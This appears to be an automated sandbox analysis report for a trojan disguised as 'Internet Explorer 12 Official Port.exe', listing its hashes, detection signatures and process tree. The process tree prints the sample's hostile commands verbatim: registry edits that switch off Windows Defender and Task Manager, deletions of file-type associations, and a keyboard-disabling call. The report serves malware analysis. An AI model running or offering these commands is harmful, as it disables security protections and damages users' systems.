Overview

overview

10

Static

static

3

Internet E...rt.exe

windows7-x64

10

Analysis

  • max time kernel
    118s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    24-04-2024 17:08

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Internet Explorer 12 Official Port.exe

  • Size

    220KB

  • MD5

    575100faacdfe66876bc039999962151

  • SHA1

    8f750c73b95bc39a7d884c9539698d3b61e122bb

  • SHA256

    b9ad9fb27da30bc536f837ed0a5922b8f3bf0eb93a46e42369d13ad62777faab

  • SHA512

    9ca59b4fda92e7a58fa2d92a7c15fbf6ac156c2cdac7c3851d48736ffcdda4f272524b13be54918d33dc72e8db1f05a7cef741822b60ab9b79c68e18d17c5046

  • SSDEEP

    1536:F7fbN3eEDhDPA/pICdUkbBtW7upvaLU0bI5taxKo0IOlnToIfuwljSZkKvnoHfhT:R7DhdC6kzWypvaQ0FxyNTBfuaj7T

Score
10/10
evasiontrojan

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 2 IoCs
    evasiontrojan
  • Disables Task Manager via registry modification
    evasion
  • Suspicious use of WriteProcessMemory 25 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Internet Explorer 12 Official Port.exe
    "C:\Users\Admin\AppData\Local\Temp\Internet Explorer 12 Official Port.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2732
    • C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\FAA.tmp\FAB.tmp\FAC.bat "C:\Users\Admin\AppData\Local\Temp\Internet Explorer 12 Official Port.exe""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2900
      • C:\Windows\system32\reg.exe
        REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
        3⤵
          PID:2912
        • C:\Windows\system32\reg.exe
          REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
          3⤵
          • Modifies Windows Defender Real-time Protection settings
          PID:2340
        • C:\Windows\system32\reg.exe
          reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f
          3⤵
            PID:2776
          • C:\Windows\system32\reg.exe
            reg delete HKCR/.exe
            3⤵
              PID:2736
            • C:\Windows\system32\reg.exe
              reg delete HKCR/.dll
              3⤵
                PID:2084
              • C:\Windows\system32\reg.exe
                reg delete HKCR/*
                3⤵
                  PID:2152
                • \??\c:\windows\system32\rundll32.exe
                  c:\windows\system32\rundll32.exe keyboard,disable
                  3⤵
                    PID:3004

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\FAA.tmp\FAB.tmp\FAC.bat
                Filesize

                852B

                MD5

                1a56f95b492e68e5414b74978cb9bf2e

                SHA1

                578fcbb790344df3d0989b0790f3bc1e33855793

                SHA256

                abfc082eb62c3f93029b2cf2134a41fa5e315e821994dee6ab6acfda92b993e8

                SHA512

                acffc8ebba901d2293897a5900d807142df8823b20eb821b0ba188013e038776ab4195b6947d9ba08669c24e26ec5251e9ea56dbe336f349637614aa0b71e9ff

                Download Submit

              • memory/2900-12-0x00000000026E0000-0x00000000026E1000-memory.dmp

                Filesize

                4KB

                Download